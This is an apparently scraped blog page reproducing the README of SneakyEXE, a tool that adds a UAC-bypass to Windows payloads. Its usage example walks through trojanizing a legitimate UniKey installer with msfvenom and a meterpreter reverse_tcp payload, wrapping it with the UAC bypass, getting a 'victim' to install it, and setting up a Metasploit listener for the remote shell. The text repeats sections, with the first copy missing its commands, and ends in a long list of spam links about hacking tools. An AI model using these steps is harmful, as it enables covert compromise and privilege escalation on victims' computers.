About SneakyEXE
SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).
SneakyEXE was tested on:
- Windows 7, 8, 10 (64 bit)
- Parrot Security OS 4.7
Requirements of SneakyEXE:
- For Linux: Architecture: Optional
Python 3.7.x: Yes
Module: termcolor
Distro: Any
Distro version: Any - For Windows: Architecture: x86_64
Python 3.7.x: No
Module: No
Windows version: 7, 8, 10
SneakyEXE's Installtion for Linux
You must install Python 3 first:
- For Debian-based distros:
sudo apt install python3
- For Arch Linux based distros:
sudo pacman -S python3
And then, open your Terminal and enter these commands:
SneakyEXE's Installtion for Windows
- Download SneakEXE-master zip file.
- Unzip it into your optional directory.
- Change dir to
\SneakyEXE\Win32\
. - Execute
sneakyexe.exe
(orsys\sneakyexe.exe
for an improved startup speed). - (Optional : you can copy
sneakyexe.exe
to whatever directory you want and delete the unzipped one)
NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.
SneakyEXE GUI verion installation for Windows
You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
Download SneakEXE-master zip file and unzip it.
And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:
How to use SneakyEXE?
Example:
I dowloaded Unikey from Unikey.org.
And then, i used
After that, to embed UAC-Bypassing codes to
And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:
and wait...
Disclaimer:
SneakyEXE GUI verion installation for Windows
You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
Download SneakEXE-master zip file and unzip it.
And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:
pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe
How to use SneakyEXE?
Example:
I dowloaded Unikey from Unikey.org.
And then, i used
msfvenom
to inject payload to UniKeyNT.exe
(payload used: windows/meterpreter/reverse_tcp
). I called the payload file is uNiKeY.exe
.After that, to embed UAC-Bypassing codes to
uNiKeY.exe
, i used this command:python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE
And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:
sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit
and wait...
Disclaimer:
- This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
- Feel free to use this project in your software, just don't reclaim the ownerhsip.
Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).
Author: Copyright © 2019 by Zenix Blurryface.
Related links
- Android Hack Tools Github
- Hacker Search Tools
- Install Pentest Tools Ubuntu
- Pentest Tools For Windows
- Pentest Tools Kali Linux
- Hack App
- Hack Website Online Tool
- Pentest Recon Tools
- Top Pentest Tools
- Growth Hacker Tools
- Pentest Tools Online
- What Are Hacking Tools
- Nsa Hacker Tools
- Blackhat Hacker Tools
- Pentest Tools Subdomain
- What Are Hacking Tools
- Nsa Hack Tools
- World No 1 Hacker Software
- Hackrf Tools
- Android Hack Tools Github
- Nsa Hacker Tools
- Hacker Tools For Pc
- Hacking Apps
- Pentest Tools For Ubuntu
- Hack Tools For Pc
- Pentest Tools Review
- Pentest Tools For Windows
- Hak5 Tools
- Hacking Tools Software
- Hacking Tools Download
- Hacking Tools For Kali Linux
- Hack Tools Pc
- Hack And Tools
- Pentest Tools For Android
- Best Hacking Tools 2019
- Hacker Tools List
- New Hack Tools
- Best Hacking Tools 2020
- Pentest Tools For Windows
- Physical Pentest Tools
- Pentest Tools Android
- Tools 4 Hack
- Pentest Tools Find Subdomains
- Hack Tools Download
- Nsa Hacker Tools
- Hacker Tool Kit
- Hacking Tools Usb
- Hacking Tools Usb
- Pentest Tools Linux
- Hack Tools Mac
- Pentest Tools Website Vulnerability
- Nsa Hacker Tools
- Pentest Automation Tools
- Hack Tools For Pc
- Hacking Tools Windows
- Top Pentest Tools
- Hack And Tools
- Hack Tools
- Nsa Hack Tools
- Hacker Tools For Pc
- Free Pentest Tools For Windows
- Beginner Hacker Tools
- Hack Tools For Pc
- Pentest Tools Online
- Hacking Tools Windows 10
- Hacking Tools For Beginners
- Hacking App
- Nsa Hacker Tools
- Tools 4 Hack
- Hacks And Tools
- Hacker Tools Windows
- Hackers Toolbox
- Pentest Tools Download
- Termux Hacking Tools 2019
- Hack And Tools
- Hacker
- Hack Rom Tools
- Hacker Tools For Pc
- Pentest Tools Apk
- Hack Tools Mac
- Underground Hacker Sites
- How To Make Hacking Tools
- Install Pentest Tools Ubuntu
- Hacker Tools 2020
- Usb Pentest Tools
- Pentest Tools Tcp Port Scanner
- Hacker Tools Mac
- Game Hacking
- Beginner Hacker Tools
- Underground Hacker Sites
- Hacker Tools Free
- Beginner Hacker Tools
- Hack Tools Online
- World No 1 Hacker Software
- Pentest Reporting Tools
- Pentest Tools For Windows
- Pentest Tools Url Fuzzer
- Hack Tools Mac
- Hacking Apps
- Hack Tools For Games
- Hacker Tools 2019
- Nsa Hacker Tools
- Hack Tools Mac
- Physical Pentest Tools
- Pentest Tools Apk
- Hacking Tools Github
- Hack Tool Apk No Root
- Hacker Tools For Pc
- Hacker Tools For Ios
- Tools Used For Hacking
- Pentest Tools Alternative
- Best Pentesting Tools 2018
- Pentest Tools Windows
- Hacker Tools Free Download
- Termux Hacking Tools 2019
- Pentest Tools Nmap
- Wifi Hacker Tools For Windows
- Pentest Tools Kali Linux
- Hacking Tools For Windows
Tidak ada komentar:
Posting Komentar